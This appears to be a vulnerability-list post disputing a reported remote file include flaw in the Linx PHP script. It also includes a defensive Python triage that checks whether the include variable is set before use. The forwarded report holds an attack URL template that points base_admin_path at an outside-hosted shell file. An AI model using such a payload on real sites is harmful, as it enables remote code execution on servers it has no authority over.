[VIM] False: Linx <= 1.0 (base_admin_path) Remote File Include Vulnerability
str0ke
str0ke at milw0rm.com
Thu Feb 1 10:07:52 EST 2007
download: http://www.kre8webdesign.com/media/download/linx-zip.zip
In the documentation it contains:

Open up /new-pages/add.php and /new-pages/search.php and edit the
second line down in each file to point to the absolute path of
config.inc.php on your webserver..

    include("/www/the/path/to/your/linx/admin/config.inc.php");
    include($base_admin_path."templates/submit-rules.php");

config.inc.php contains:

    $base_admin_path = '/www/path/to/linx/admin/';
Seems this script isn't vulnerable after installing the app correctly.
/str0ke
-------- received email edited below.
<?
include($base_admin_path."templates/submit-rules.php");
?>
http://[target]/[path]//new-pages/add.php?base_admin_path=[SHELL]
Example:
//new-pages/add.php?base_admin_path=http://[target]/[path]/shell.x
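
The check described in the message, as an added example (not part of the original post and not code from Linx): a line-based triage that follows static includes and reports whether a variable used in an include path has been assigned before use. The file set is constructed from the snippets quoted above and the file names are assumptions. It is a heuristic that ignores branches, functions and unset().

```python
import re

# Constructed file set modelled on the snippets quoted in the message; paths are assumptions.
FILES = {
    "/www/linx/admin/config.inc.php":
        "<?php\n$base_admin_path = '/www/path/to/linx/admin/';\n",
    # Installed as documented: line 2 points at the real config.inc.php.
    "installed/add.php":
        '<?php\ninclude("/www/linx/admin/config.inc.php");\n'
        'include($base_admin_path."templates/submit-rules.php");\n',
    # Documentation placeholder left unedited: that file does not exist here.
    "unedited/add.php":
        '<?php\ninclude("/www/the/path/to/your/linx/admin/config.inc.php");\n'
        'include($base_admin_path."templates/submit-rules.php");\n',
    # The excerpt from the forwarded report, taken in isolation.
    "reported/add.php":
        '<?\ninclude($base_admin_path."templates/submit-rules.php");\n?>\n',
}

INCLUDE = re.compile(r"\b(?:include|require)(?:_once)?\s*\(?\s*(.+?)\s*\)?\s*;")
ASSIGN = re.compile(r"^\s*\$(\w+)\s*=[^=]")
LITERAL = re.compile(r"""^(["'])([^"'$]+)\1$""")

def triage(path, files, known=None, seen=None):
    """Return (file, line, variable, initialised) for each variable-based include."""
    known = set() if known is None else known
    seen = set() if seen is None else seen
    if path in seen or path not in files:
        return []  # missing file: include() only warns, so nothing gets defined
    seen.add(path)
    findings = []
    for no, line in enumerate(files[path].splitlines(), 1):
        if (m := ASSIGN.match(line)):
            known.add(m.group(1))
        elif (m := INCLUDE.search(line)):
            arg = m.group(1)
            if (lit := LITERAL.match(arg)):
                # Static include: follow it so its assignments count.
                findings += triage(lit.group(2), files, known, seen)
            else:
                findings += [(path, no, v, v in known)
                             for v in re.findall(r"\$(\w+)", arg)]
    return findings

if __name__ == "__main__":
    for name in ("installed/add.php", "unedited/add.php", "reported/add.php"):
        for f, no, var, ok in triage(name, FILES):
            print(f"{f}:{no} ${var} ->", "set before use" if ok else "NOT set before use")
```

Only the copy whose second line reaches a real config.inc.php reports the variable as set before use, which matches the "after installing the app correctly" condition in the message.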